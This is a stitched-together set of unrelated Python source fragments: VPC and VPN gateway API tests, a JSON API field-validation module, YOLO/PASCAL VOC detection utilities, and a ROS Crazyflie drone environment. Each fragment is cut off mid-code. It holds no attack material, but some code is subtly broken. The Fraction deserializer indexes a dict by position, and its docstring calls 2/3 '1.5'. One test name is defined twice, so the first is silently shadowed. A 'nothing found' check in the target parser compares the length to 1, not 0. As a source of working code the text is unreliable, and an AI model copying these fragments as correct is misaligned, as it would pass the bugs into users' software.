route = update_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
assertGetPatchResponse(route)
def test_delete_route(self, createGen1Service):
pytest.skip("No env")
route = delete_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
assertDeleteResponse(route)
class TestAddressPrefix():
def test_create_address_prefix(self, createGen1Service):
address_prefix = create_vpc_address_prefix(createGen1Service, store['created_vpc'], store['zone'])
assertCreateResponse(address_prefix)
store['created_address_prefix'] = address_prefix.get_result()['id']
def test_list_address_prefixes(self, createGen1Service):
address_prefixs = list_vpc_address_prefixes(createGen1Service, store['created_vpc'])
assertListResponse(address_prefixs, 'address_prefixes')
def test_get_address_prefix(self, createGen1Service):
address_prefix = get_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
assertGetPatchResponse(address_prefix)
def test_update_address_prefix(self, createGen1Service):
address_prefix = update_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
assertGetPatchResponse(address_prefix)
def test_delete_address_prefix(self, createGen1Service):
address_prefix = delete_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
assertDeleteResponse(address_prefix)
class TestVPNGateways():
def test_create_ike_policy(self, createGen1Service):
ike_policy = create_ike_policy(createGen1Service)
assertCreateResponse(ike_policy)
store['created_ike_policy_id'] = ike_policy.get_result()['id']
def test_list_ike_policies(self, createGen1Service):
ike_policies = list_ike_policies(createGen1Service)
assertListResponse(ike_policies, 'ike_policies')
def test_get_ike_policy(self, createGen1Service):
ike_policy = get_ike_policy(createGen1Service, store['created_ike_policy_id'])
assertGetPatchResponse(ike_policy)
def test_update_ike_policy(self, createGen1Service):
ike_policy = update_ike_policy(createGen1Service, store['created_ike_policy_id'])
assertGetPatchResponse(ike_policy)
def test_list_ike_policy_connections(self, createGen1Service):
ike_policies_conn = list_ike_policy_connections(createGen1Service, store['created_ike_policy_id'])
assertListResponse(ike_policies_conn, 'connections')
def test_create_ipsec_policy(self, createGen1Service):
ipsec_policy = create_ipsec_policy(createGen1Service)
assertCreateResponse(ipsec_policy)
store['created_ipsec_policy_id'] = ipsec_policy.get_result()['id']
def test_list_ike_policies(self, createGen1Service):
ipsec_policies = list_ipsec_policies(createGen1Service)
assertListResponse(ipsec_policies, 'ipsec_policies')
def test_get_ipsec_policy(self, createGen1Service):
ipsec_policy = get_ipsec_policy(createGen1Service, store['created_ipsec_policy_id'])
assertGetPatchResponse(ipsec_policy)
def test_update_ipsec_policy(self, createGen1Service):
ipsec_policy = update_ipsec_policy(createGen1Service, store['created_ipsec_policy_id'])
assertGetPatchResponse(ipsec_policy)
def test_list_ipsec_policy_connections(self, createGen1Service):
ipsec_policies_conn = list_ipsec_policy_connections(createGen1Service, store['created_ipsec_policy_id'])
assertListResponse(ipsec_policies_conn, 'connections')
# vpn_gateways
def test_create_vpn_gateway(self, createGen1Service):
vpn_gateway = create_vpn_gateway(createGen1Service, store['created_subnet'])
assertCreateResponse(vpn_gateway)
store['created_vpn_gateway_id'] = vpn_gateway.get_result()['id']
def test_list_vpn_gateways(self, createGen1Service):
ipsec_policies = list_vpn_gateways(createGen1Service)
assertListResponse(ipsec_policies, 'vpn_gateways')
def test_get_vpn_gateway(self, createGen1Service):
vpn_gateway = get_vpn_gateway(createGen1Service, store['created_vpn_gateway_id'])
assertGetPatchResponse(vpn_gateway)
def test_update_vpn_gateway(self, createGen1Service):
vpn_gateway = update_vpn_gateway(createGen1Service, store['created_vpn_gateway_id'])
assertGetPatchResponse(vpn_gateway)
# vpn_gateways_connections
def test_create_vpn_gateway_connections(self, createGen1Service):
vpn_gateway_connection = create_vpn_gateway_connection(createGen1Service, store['created_vpn_gateway_id'])
assertCreateResponse(vpn_gateway_connection)
store['created_vpn_gateway_connection_id'] = vpn_gateway_connection.get_result()['id']
def test_list_vpn_gateway_connections(self, createGen1Service):
vpn_gateway_connections = list_vpn_gateway_connections(createGen1Service, store['created_vpn_gateway_id'])
assertListResponse(vpn_gateway_connections, 'connections')
def test_get_vpn_gateway_connection(self, createGen1Service):
vpn_gateway_connection = get_vpn_gateway_connection(createGen1Service, store['created_vpn_gateway_id'], store['created_vpn_gateway_connection_id'])
assertGetPatchResponse(vpn_gateway_connection)
def test_update_vpn_gateway_connection(self, createGen1Service):
vpn_gateway_connection = | |
"""
Fields
======
.. note::
Always remember that you can model the JSON API completly with the fields
in :mod:`~aiohttp_json_api.schema.base_fields`.
.. sidebar:: Index
* :class:`String`
* :class:`Integer`
* :class:`Float`
* :class:`Complex`
* :class:`Decimal`
* :class:`Fraction`
* :class:`DateTime`
* :class:`TimeDelta`
* :class:`UUID`
* :class:`Boolean`
* :class:`URI`
* :class:`Email`
* :class:`Dict`
* :class:`List`
* :class:`Number`
* :class:`Str`
* :class:`Bool`
This module contains fields for several standard Python types and classes
from the standard library.
"""
import collections
import datetime
import fractions
import uuid
from enum import Enum
import trafaret as t
from trafaret.contrib import rfc_3339
from yarl import URL
from .base import Attribute
from .trafarets import DecimalTrafaret
from ..errors import InvalidType, InvalidValue
from ..helpers import is_collection
__all__ = [
"String",
"Integer",
"Float",
"Complex",
"Decimal",
"Fraction",
"DateTime",
"TimeDelta",
"UUID",
"Boolean",
"URI",
"Email",
"Dict",
"List",
"Number",
"Str",
"Bool"
]
class String(Attribute):
def __init__(self, *, allow_blank=False, regex=None, choices=None,
min_length=None, max_length=None, **kwargs):
super(String, self).__init__(**kwargs)
if regex is not None:
self._trafaret = t.Regexp(regex)
else:
self._trafaret = t.String(allow_blank=allow_blank,
min_length=min_length,
max_length=max_length)
self.choices = None
if choices and is_collection(choices):
if isinstance(choices, type(Enum)):
self.choices = choices
self._trafaret &= t.Enum(*choices.__members__.keys())
else:
self._trafaret &= t.Enum(*choices)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
detail = error.as_dict()
if self.choices is not None:
detail += ' ({})'.format(
', '.join(self.choices.__members__.keys())
)
raise InvalidValue(detail=detail, source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return self.choices[data] \
if isinstance(self.choices, type(Enum)) and \
data in self.choices.__members__ \
else data
def serialize(self, schema, data, **kwargs):
if isinstance(data, Enum):
result = self._trafaret.check(data.name)
else:
result = self._trafaret.check(data)
return result
class Integer(Attribute):
def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
super(Integer, self).__init__(**kwargs)
self._trafaret = t.Int(gte=gte, lte=lte, gt=gt, lt=lt)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidValue(detail=error.as_dict(), source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return self._trafaret.check(data)
def serialize(self, schema, data, **kwargs):
return self._trafaret.check(data)
class Float(Attribute):
def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
super(Float, self).__init__(**kwargs)
self._trafaret = t.Float(gte=gte, lte=lte, gt=gt, lt=lt)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidValue(detail=error.as_dict(), source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return self._trafaret.check(data)
def serialize(self, schema, data, **kwargs):
return self._trafaret.check(data)
class Complex(Attribute):
"""
Encodes a :class:`complex` number as JSON object with a *real* and *imag*
member::
{"real": 1.2, "imag": 42}
"""
def pre_validate(self, schema, data, sp):
detail = "Must be an object with a 'real' and 'imag' member.'"
if not isinstance(data, collections.Mapping):
raise InvalidType(detail=detail, source_pointer=sp)
if not "real" in data:
detail = "Does not have a 'real' member."
raise InvalidValue(detail=detail, source_pointer=sp)
if not "imag" in data:
detail = "Does not have an 'imag' member."
raise InvalidValue(detail=detail, source_pointer=sp)
if not isinstance(data["real"], (int, float)):
detail = "The real part must be a number."
raise InvalidValue(detail=detail, source_pointer=sp / "real")
if not isinstance(data["imag"], (int, float)):
detail = "The imaginar part must be a number."
raise InvalidValue(detail=detail, source_pointer=sp / "imag")
def deserialize(self, schema, data, sp, **kwargs):
return complex(data["real"], data["imag"])
def serialize(self, schema, data, **kwargs):
data = complex(data)
return {"real": data.real, "imag": data.imag}
class Decimal(Attribute):
"""Encodes and decodes a :class:`decimal.Decimal` as a string."""
def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
super(Decimal, self).__init__(**kwargs)
self._trafaret = DecimalTrafaret(gte=gte, lte=lte, gt=gt, lt=lt)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidValue(detail=error.as_dict(), source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
if self.allow_none and data is None:
return None
return self._trafaret.check(data)
def serialize(self, schema, data, **kwargs):
if self.allow_none and data is None:
return None
return str(self._trafaret.check(data))
class Fraction(Attribute):
"""Stores a :class:`fractions.Fraction` in an object with a *numerator*
and *denominator* member::
# 1.5
{"numerator": 2, "denominator": 3}
:arg float min:
The fraction must be greater or equal than this value.
:arg float max:
The fraction must be less or equal than this value.
"""
def __init__(self, *, min=None, max=None, **kwargs):
super(Fraction, self).__init__(**kwargs)
# min must be <= max
assert min is None or max is None or min <= max
self.min = min
self.max = max
def pre_validate(self, schema, data, sp):
if not isinstance(data, dict):
detail = "Must be an object with " \
"a 'numerator' and 'denominator' member."
raise InvalidType(detail=detail, source_pointer=sp)
if not "numerator" in data:
detail = "Does not have a 'numerator' member."
raise InvalidValue(detail=detail, source_pointer=sp)
if not "denominator" in data:
detail = "Does not have a 'denominator' member."
raise InvalidValue(detail=detail, source_pointer=sp)
if not isinstance(data["numerator"], int):
detail = "The numerator must be an integer."
raise InvalidValue(detail=detail, source_pointer=sp / "numerator")
if not isinstance(data["denominator"], int):
detail = "The denominator must be an integer."
raise InvalidValue(detail=detail,
source_pointer=sp / "denominator")
if data["denominator"] == 0:
detail = "The denominator must be not equal to zero."
raise InvalidValue(detail=detail,
source_pointer=sp / "denominator")
val = data["numerator"] / data["denominator"]
if self.min is not None and self.min > val:
detail = f'Must be >= {self.min}.'
raise InvalidValue(detail=detail, source_pointer=sp)
if self.max is not None and self.max < val:
detail = f'Must be <= {self.max}.'
raise InvalidValue(detail=detail, source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return fractions.Fraction(int(data[0]), int(data[1]))
def serialize(self, schema, data, **kwargs):
return {"numerator": data.numerator, "denominator": data.denominator}
class DateTime(Attribute):
"""
Stores a :class:`datetime.datetime` in ISO-8601 as recommended in
http://jsonapi.org/recommendations/#date-and-time-fields.
"""
def __init__(self, *, allow_blank: bool = False, **kwargs):
super(DateTime, self).__init__(**kwargs)
self._trafaret = rfc_3339.DateTime(allow_blank=allow_blank)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidValue(detail=error.as_dict(), source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return self._trafaret.check(data)
def serialize(self, schema, data, **kwargs):
if isinstance(data, datetime.datetime):
return data.isoformat()
return self._trafaret.check(data)
class Date(Attribute):
"""
Stores a :class:`datetime.datetime` in ISO-8601 as recommended in
http://jsonapi.org/recommendations/#date-and-time-fields.
"""
def __init__(self, *, allow_blank: bool = False, **kwargs):
super(Date, self).__init__(**kwargs)
self._trafaret = rfc_3339.Date(allow_blank=allow_blank)
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidValue(detail=error.as_dict(), source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return self._trafaret.check(data)
def serialize(self, schema, data, **kwargs):
if isinstance(data, datetime.date):
return data.isoformat()
return self._trafaret.check(data)
class TimeDelta(Attribute):
"""Stores a :class:`datetime.timedelta` as total number of seconds.
:arg datetime.timedelta min:
The timedelta must be greater or equal than this value.
:arg datetime.timedelta max:
The timedelta must be less or equal than this value.
"""
def __init__(self, *, min=None, max=None, **kwargs):
super(TimeDelta, self).__init__(**kwargs)
# min must be <= max
assert min is None or max is None or min <= max
self.min = min
self.max = max
def pre_validate(self, schema, data, sp):
try:
data = float(data)
except TypeError:
detail = "Must be a number."
raise InvalidType(detail=detail, source_pointer=sp)
data = datetime.timedelta(seconds=data)
if self.min is not None and self.min > data:
detail = f'The timedelta must be >= {self.min}.'
raise InvalidValue(detail=detail, source_pointer=sp)
if self.max is not None and self.max < data:
detail = f'The timedelta must be <= {self.max}.'
raise InvalidValue(detail=detail, source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
return datetime.timedelta(seconds=float(data))
def serialize(self, schema, data, **kwargs):
return data.total_seconds()
class UUID(Attribute):
"""Encodes and decodes a :class:`uuid.UUID`.
:arg int version:
The required version of the UUID.
"""
def __init__(self, *, version=None, **kwargs):
super(UUID, self).__init__(**kwargs)
self.version = version
def pre_validate(self, schema, data, sp):
if self.allow_none and data is None:
return
if not isinstance(data, str):
detail = "The UUID must be a hexadecimal string."
raise InvalidType(detail=detail, source_pointer=sp)
try:
data = uuid.UUID(hex=data)
except ValueError:
detail = "The UUID is badly formed (the representation as " \
"hexadecimal string is needed)."
raise InvalidValue(detail=detail, source_pointer=sp)
if self.version is not None and self.version != data.version:
detail = f'Not a UUID{self.version}.'
raise InvalidValue(detail=detail, source_pointer=sp)
def deserialize(self, schema, data, sp, **kwargs):
if self.allow_none and data is None:
return None
return uuid.UUID(hex=data)
def serialize(self, schema, data, **kwargs):
if self.allow_none and data is None:
return None
return data.hex
class Boolean(Attribute):
"""
Ensures that the input is a :class:`bool`.
"""
def __init__(self, **kwargs):
super(Boolean, self).__init__(**kwargs)
self._trafaret = t.Bool()
if self.allow_none:
self._trafaret |= t.Null()
def pre_validate(self, schema, data, sp):
try:
self._trafaret.check(data)
except t.DataError as error:
raise InvalidType(detail=error.as_dict(), source_pointer=sp)
def serialize(self, schema, data, **kwargs):
return self._trafaret.check(data)
class URI(Attribute):
"""Parses the URI with :func:`rfc3986.urlparse` and returns the result."""
def pre_validate(self, schema, data, sp):
if not isinstance(data, str):
detail = "Must be a string."
raise InvalidType(detail=detail, source_pointer=sp)
try:
URL(data)
except ValueError:
detail = "Not a valid URI."
raise InvalidValue(detail=detail, source_pointer=sp)
def | |
import os
import io
import cv2
import sys
import time
import pickle
import getopt
import torch
import random
import numpy as np
import torch.utils.data as data
import xml.etree.ElementTree as ET
import torchvision.transforms as transforms
from cv2 import cv2
from visdom import Visdom
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
VOC_CLASSES = (
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair',
'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor')
Color = [[0, 0, 0],
[128, 0, 0],
[0, 128, 0],
[128, 128, 0],
[0, 0, 128],
[128, 0, 128],
[0, 128, 128],
[128, 128, 128],
[64, 0, 0],
[192, 0, 0],
[64, 128, 0],
[192, 128, 0],
[64, 0, 128],
[192, 0, 128],
[64, 128, 128],
[192, 128, 128],
[0, 64, 0],
[128, 64, 0],
[0, 192, 0],
[128, 192, 0],
[0, 64, 128]]
# write image or paint image
class imageShow():
def __init__(self):
pass
# show image with boxes
@staticmethod
def boxImageShow(cv2_image, probs, labels, boxes, write_file='', use_visdom=True, resize=False):
h, w, _ = cv2_image.shape
boxes = torch.Tensor(boxes)
if resize:
boxes = boxes * torch.Tensor([w, h, w, h]).expand_as(boxes)
for i in range(len(probs)):
pt1 = (int(boxes[i][0]), int(boxes[i][1]))
pt2 = (int(boxes[i][2]), int(boxes[i][3]))
if probs == 0 or pt1 == pt2:
continue
color = Color[int(labels[i])]
title = str(round(probs[i], 3)) + ', ' + VOC_CLASSES[int(labels[i])]
cv2.rectangle(img=cv2_image, pt1=pt1, pt2=pt2, color=color, thickness=2)
cv2.putText(img=cv2_image, text=title, org=(pt1[0], pt1[1] + 20), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, color=(0,0,255), thickness=2)
if write_file != '':
cv2.imwrite(write_file, cv2_image)
if use_visdom:
img = cv2.cvtColor(cv2_image, cv2.COLOR_BGR2RGB)
img = transforms.ToTensor()(img)
Visdom(env='main').image(img, win='showBox')
@staticmethod
def curveShow(x_list, y_list, xlabel='', ylabel='', title='', use_visdom=True, write_file=''):
plt.plot(x_list, y_list)
plt.xlabel(xlabel, size=13)
plt.ylabel(ylabel, size=13)
plt.title(title, size=13)
# turn plt into cv2
buf = io.BytesIO()
plt.savefig(buf, format='jpg')
plt.close()
buf.seek(0) # to the first address
img = cv2.imdecode(np.frombuffer(buf.getvalue(), np.uint8), cv2.IMREAD_COLOR)
buf.close()
if write_file != '':
cv2.imwrite(write_file, img)
if use_visdom:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = transforms.ToTensor()(img)
Visdom(env='main').image(img, win='showBox')
# function class generating and parsing target
class targetGenerator():
def __init__(self):
pass
# return name x1 y1 x2 y2 class x1 y1 x2 y2 class ...
@staticmethod
def parseVOCXml(filename, spec_difficult=0):
'''
voc xml sample: VOC2007/Annotations/009931.xml:
<annotation>
<folder>VOC2007</folder>
<filename>009931.jpg</filename>
<source>
<database>The VOC2007 Database</database>
<annotation>PASCAL VOC2007</annotation>

<flickrid>336444880</flickrid>
</source>
<owner>
<flickrid><NAME></flickrid>
<name><NAME></name>
</owner>
<size>
<width>500</width>
<height>332</height>
<depth>3</depth>
</size>
<segmented>0</segmented>
<object>
<name>person</name>
<pose>Frontal</pose>
<truncated>0</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>135</xmin>
<ymin>159</ymin>
<xmax>170</xmax>
<ymax>250</ymax>
</bndbox>
<part>
<name>head</name>
<bndbox>
<xmin>147.7376</xmin>
<ymin>158.2127</ymin>
<xmax>159.3398</xmax>
<ymax>173.6823</ymax>
</bndbox>
</part>
<part>
...
</part>
</object>
<object>
<name>horse</name>
<pose>Unspecified</pose>
<truncated>0</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>90</xmin>
<ymin>160</ymin>
<xmax>143</xmax>
<ymax>250</ymax>
</bndbox>
</object>
<object>
...
</object>
</annotation>
'''
root = ET.parse(filename).getroot()
# size = root.find('size')
name = root.find('filename').text
# width = int(float(size.find('width').text))
# height = int(float(size.find('height').text))
# depth = int(float(size.find('depth').text))
# segmented = int(float(root.find('segmented').text))
# if spec_segmented != -1 and segmented != spec_segmented:
# return ''
objects = []
for obj in root.findall('object'):
tmp = {}
bndbox = obj.find('bndbox')
tmp['name'] = obj.find('name').text
tmp['pose'] = obj.find('pose').text
tmp['truncated'] = int(float(obj.find('truncated').text))
tmp['difficult'] = int(float(obj.find('difficult').text))
tmp['xmin'] = int(float(bndbox.find('xmin').text))
tmp['ymin'] = int(float(bndbox.find('ymin').text))
tmp['xmax'] = int(float(bndbox.find('xmax').text))
tmp['ymax'] = int(float(bndbox.find('ymax').text))
if spec_difficult != -1 and tmp['difficult'] != spec_difficult:
continue
objects.append(tmp)
# print(filename, width, height, depth, segmented, objects)
info = ''
for obj in objects:
info = info + ' ' + str(obj['xmin']) + ' ' + str(obj['ymin'])
info = info + ' ' + str(obj['xmax']) + ' ' + str(obj['ymax'])
info = info + ' ' + str(VOC_CLASSES.index(obj['name']))
if str(name).strip() == '':
return ''
return name + info + '\n'
# from annotation folder generate a text
@classmethod
def VOCXml2Txt(cls, annotations, out_file):
out_file = open(out_file, 'w')
xml_files = os.listdir(annotations)
xml_files.sort()
for xml_file in xml_files:
out_file.write(cls.parseVOCXml(annotations + xml_file))
out_file.close()
# return list imagefile names, labels (0-19), boxes
@staticmethod
def loadBoxLabel(list_file):
imagefiles, labels, boxes = [], [], []
# fix arg listfile ------------------
list_file = [list_file] if isinstance(list_file, str) else list_file
# read boxes and labels in lines -------------
lines = []
for filename in list_file:
with open(filename) as f:
lines.extend(f.readlines())
for line in lines:
splited = line.strip().split()
imagefiles.append(splited[0])
# one image could has many boxes
box = []
label = []
num_box = (len(splited) - 1) // 5
for i in range(num_box):
x1 = float(splited[1+5*i])
y1 = float(splited[2+5*i])
x2 = float(splited[3+5*i])
y2 = float(splited[4+5*i])
box.append([x1, y1, x2, y2])
label.append(int(splited[5+5*i]))
boxes.append(box)
labels.append(label)
return imagefiles, labels, boxes
# return target of 14x14x30, 30 means label can be 0-19
@staticmethod
def genTarget(height, width, boxes, labels):
# TARGET: 14x14x30 (in YOLO v1, 7x7x30)
# target[i,j,0:4]: bounding box 1 position (dx dy w h)
# target[i,j,4]: confidence for box 1
# target[i,j,5:9]: bounding box 2 position (dx dy w h)
# target[i,j,9]: confidence for box 2
# target[i,j,10:30]: probability for the object with this label if truly have object
# dx = center_x / cell_size - i; dy = center_y / cell_size - j
# confidence for box k = P{have object} * IOU{prediction box compare to ground truth}
# IOU{prediction box compare to ground truth} = 1, when in eval mode
box_num = 2
grid_num = 14
target_num = 30
target = torch.zeros((grid_num, grid_num, target_num))
cell_size = 1.0 / grid_num
boxes = boxes / torch.Tensor([width, height, width, height]).expand_as(boxes)
box_size = boxes[:,2:] - boxes[:,:2]
center = (boxes[:,2:] + boxes[:,:2]) / 2.0
# if in one grid, then cover the target
for i in range(center.size()[0]):
grid = (center[i] / cell_size).ceil() - 1 # center in which grid
delta = center[i] / cell_size - grid # delta between center and grid_left_top
coordx, coordy = int(grid[0]), int(grid[1]) # since cv2_image is h,w,c, so coordy first
target[coordy, coordx, int(labels[i]) + box_num * 5] = 1
for b in range(box_num):
tmp_ind = b * 5
target[coordy, coordx, tmp_ind:tmp_ind+2] = delta
target[coordy, coordx, tmp_ind+2:tmp_ind+4] = box_size[i]
target[coordy, coordx, tmp_ind+4] = 1
return target
# non maximum suppression, return list keep whith input np.array boxes and probs
@staticmethod
def nms(boxes, probs, threshold=0.5):
# input probs: np.array([...]), boxes: np.array([[x1,y1,x2,y2],...])
keep = []
order = np.argsort(probs)[::-1]
left_tops = boxes[:,0:2]
right_bottoms = boxes[:,2:4]
width_heights = right_bottoms - left_tops
areas = width_heights[:,0] * width_heights[:,1]
while len(order) > 0:
# store max confidence
i = order[0]
keep.append(i)
order = order[1:]
if len(order) == 0: break
# calc iou = intersection / union
max_left_tops = np.maximum(left_tops[i,:], left_tops[order,:])
min_right_bottoms = np.minimum(right_bottoms[i,:], right_bottoms[order,:])
min_width_heights = np.maximum(0.0, (min_right_bottoms - max_left_tops))
intersections = min_width_heights[:, 0] * min_width_heights[:, 1]
ious = intersections / (areas[i] + areas[order] - intersections)
order = order[np.where(ious <= threshold)[0]]
return keep
# return list probs, labels(0-19), boxes with input tensor target 14x14x30, use nms
@classmethod
def parseTarget(cls, target, height, width, threshold=0.1):
probs, labels, boxes = [], [], []
box_num = 2
grid_num = 14
all_box_num = 5 * box_num
cell_size = 1.0 / grid_num
conf_ind = list(range(4, all_box_num, 5))
for i in range(grid_num):
for j in range(grid_num):
tmp_info = []
box_target = target[i, j, :all_box_num].numpy()
box_confs = box_target[conf_ind]
prob_label, label = target[i, j, all_box_num:].max(0)
prob_label, label = prob_label.item(), label.item()
# check if some boxes has high probabilities
for b in range(box_num):
ind = 5 * b
if box_target[ind+4] > threshold:
tmp_info.append(tuple(box_target[ind:ind+5]))
# nothing found so far
if len(tmp_info) == 1:
ind = box_confs.argmax() * 5
tmp_info.append(tuple(box_target[ind:ind+5]))
# turn tmp_info into [prob, label, box]
tmp_info = list(set(tmp_info)) # delete repeated value
for tmp in tmp_info:
tmp = list(tmp)
center_x, center_y = cell_size * (tmp[0] + j), cell_size * (tmp[1] + i)
x1 = (center_x - tmp[2] / 2.0) * width
x2 = (center_x + tmp[2] / 2.0) * width
y1 = (center_y - tmp[3] / 2.0) * height
y2 = (center_y + tmp[3] / 2.0) * height
prob = prob_label * tmp[4]
if prob > threshold:
boxes.append([x1, y1, x2, y2])
labels.append(int(label))
probs.append(prob)
# non maximum suppression
if len(probs) == 0:
return [], [], [[]]
probs, labels, boxes = np.array(probs), np.array(labels), np.array(boxes)
keep = cls.nms(boxes, probs)
return probs[keep].tolist(), labels[keep].tolist(), boxes[keep].tolist()
# function class transforing images
class imageTransform():
voc_mean = (123,117,104) # VOC images mean RGB
image_size = 448 # YOLO input size
def __init__(self):
pass
@classmethod
def loadImageTensor(cls, filename):
img | |
import os
from collections import OrderedDict
import numpy as np
from PIL import Image
from io import BytesIO
from gcg.envs.env import Env
from gcg.envs.env_spec import EnvSpec
from gcg.envs.spaces.box import Box
from gcg.envs.spaces.discrete import Discrete
from gcg.data.logger import logger
import matplotlib.pyplot as plt
import threading
import time
import rospy
import rosbag
import std_msgs.msg
import geometry_msgs.msg
import sensor_msgs.msg
import crazyflie.msg
class RolloutRosbag:
def __init__(self):
self._rosbag = None
self._last_write = None
@property
def _rosbag_dir(self):
dir = os.path.join(logger.dir, 'rosbags')
if not os.path.exists(dir):
os.mkdir(dir)
return dir
def _rosbag_name(self, num):
return os.path.join(self._rosbag_dir, 'rosbag{0:04d}.bag'.format(num))
@property
def is_open(self):
return (self._rosbag is not None)
def open(self):
assert (not self.is_open)
bag_num = 0
while os.path.exists(self._rosbag_name(bag_num)):
bag_num += 1
self._rosbag = rosbag.Bag(self._rosbag_name(bag_num), 'w', compression='bz2')
self._last_write = rospy.Time.now()
def write(self, topic, msg, stamp):
assert (self._rosbag is not None)
if msg is not None and stamp is not None:
if stamp > self._last_write:
self._rosbag.write(topic, msg)
else:
logger.warn('Topic {0} not received'.format(topic))
def write_all(self, topics, msg_dict, stamp_dict):
for topic in topics:
self.write(topic, msg_dict.get(topic), stamp_dict.get(topic))
def close(self):
assert (self.is_open)
self._rosbag.close()
self._rosbag = None
self._last_write = None
def trash(self):
assert (self.is_open)
bag_fname = self._rosbag.filename
try:
self.close()
except:
pass
os.remove(os.path.join(self._rosbag_dir, bag_fname))
class CrazyflieEnv(Env):
def __init__(self, params={}):
params.setdefault('dt', 0.25)
params.setdefault('horizon', int(5. * 60. / params['dt'])) # 5 minutes worth
params.setdefault('ros_namespace', '/crazyflie/')
params.setdefault('obs_shape', (72, 96, 1))
params.setdefault('yaw_limits', [-120, 120]) #default yaw rate range
params.setdefault('fixed_alt', 0.4)
params.setdefault('fixed_velocity_range', [0.4, 0.4])
params.setdefault('press_enter_on_reset', False)
params.setdefault('prompt_save_rollout_on_coll', False)
params.setdefault('enable_adjustment_on_start', True)
params.setdefault('use_joy_commands', True)
params.setdefault('joy_start_btn', 1) #A
params.setdefault('joy_stop_btn', 2) #B
params.setdefault('joy_coll_stop_btn', 0) #X
params.setdefault('joy_trash_rollout_btn', 3) # Y
params.setdefault('joy_topic', '/joy')
params.setdefault('collision_reward', 1)
params.setdefault('collision_reward_only', True)
self._obs_shape = params['obs_shape']
self._yaw_limits = params['yaw_limits']
self._fixed_alt = params['fixed_alt']
self._collision_reward = params['collision_reward']
self._collision_reward_only = params['collision_reward_only']
self._fixed_velocity_range = params['fixed_velocity_range']
self._fixed_velocity = np.random.uniform(self._fixed_velocity_range[0], self._fixed_velocity_range[1])
self._dt = params['dt']
self.horizon = params['horizon']
# start stop and pause
self._enable_adjustment_on_start = params['enable_adjustment_on_start']
self._use_joy_commands = params['use_joy_commands']
self._joy_topic = params['joy_topic']
self._joy_stop_btn = params['joy_stop_btn']
self._joy_coll_stop_btn = params['joy_coll_stop_btn']
self._joy_start_btn = params['joy_start_btn']
self._joy_trash_rollout_btn = params['joy_trash_rollout_btn']
self._press_enter_on_reset = params['press_enter_on_reset']
self._prompt_save_rollout_on_coll = params['prompt_save_rollout_on_coll']
self._start_pressed = False
self._stop_pressed = False
self._trash_rollout = False
self._coll_stop_pressed = False
self._curr_joy = None
self._curr_motion = crazyflie.msg.CFMotion()
self._setup_spec()
assert (self.observation_im_space.shape[-1] == 1 or self.observation_im_space.shape[-1] == 3)
self.spec = EnvSpec(
observation_im_space=self.observation_im_space,
action_space=self.action_space,
action_selection_space=self.action_selection_space,
observation_vec_spec=self.observation_vec_spec,
action_spec=self.action_spec,
action_selection_spec=self.action_selection_spec,
goal_spec=self.goal_spec)
self._last_step_time = None
self._is_collision = False
rospy.init_node('CrazyflieEnv', anonymous=True)
time.sleep(0.5)
self._ros_namespace = params['ros_namespace']
self._ros_topics_and_types = dict([
('cf/0/image', sensor_msgs.msg.CompressedImage),
('cf/0/data', crazyflie.msg.CFData),
('cf/0/coll', std_msgs.msg.Bool),
('cf/0/motion', crazyflie.msg.CFMotion)
])
self._ros_msgs = dict()
self._ros_msg_times = dict()
for topic, type in self._ros_topics_and_types.items():
rospy.Subscriber(topic, type, self.ros_msg_update, (topic,))
self._ros_motion_pub = rospy.Publisher("/cf/0/motion", crazyflie.msg.CFMotion, queue_size=10)
self._ros_command_pub = rospy.Publisher("/cf/0/command", crazyflie.msg.CFCommand, queue_size=10)
self._ros_stop_pub = rospy.Publisher('/joystop', crazyflie.msg.JoyStop, queue_size=10)
if self._use_joy_commands:
logger.debug("Environment using joystick commands")
self._ros_joy_sub = rospy.Subscriber(self._joy_topic, sensor_msgs.msg.Joy, self._joy_cb)
# I don't think this is needed
# self._ros_pid_enable_pub = rospy.Publisher(self._ros_namespace + 'pid/enable', std_msgs.msg.Empty,
# queue_size=10)
# self._ros_pid_disable_pub = rospy.Publisher(self._ros_namespace + 'pid/disable', std_msgs.msg.Empty,
# queue_size=10)
self._ros_rolloutbag = RolloutRosbag()
self._t = 0
self.suppress_output = False
self.resetting = False
self._send_override = False # set true only when resetting but still wanting to send background thread motion commands
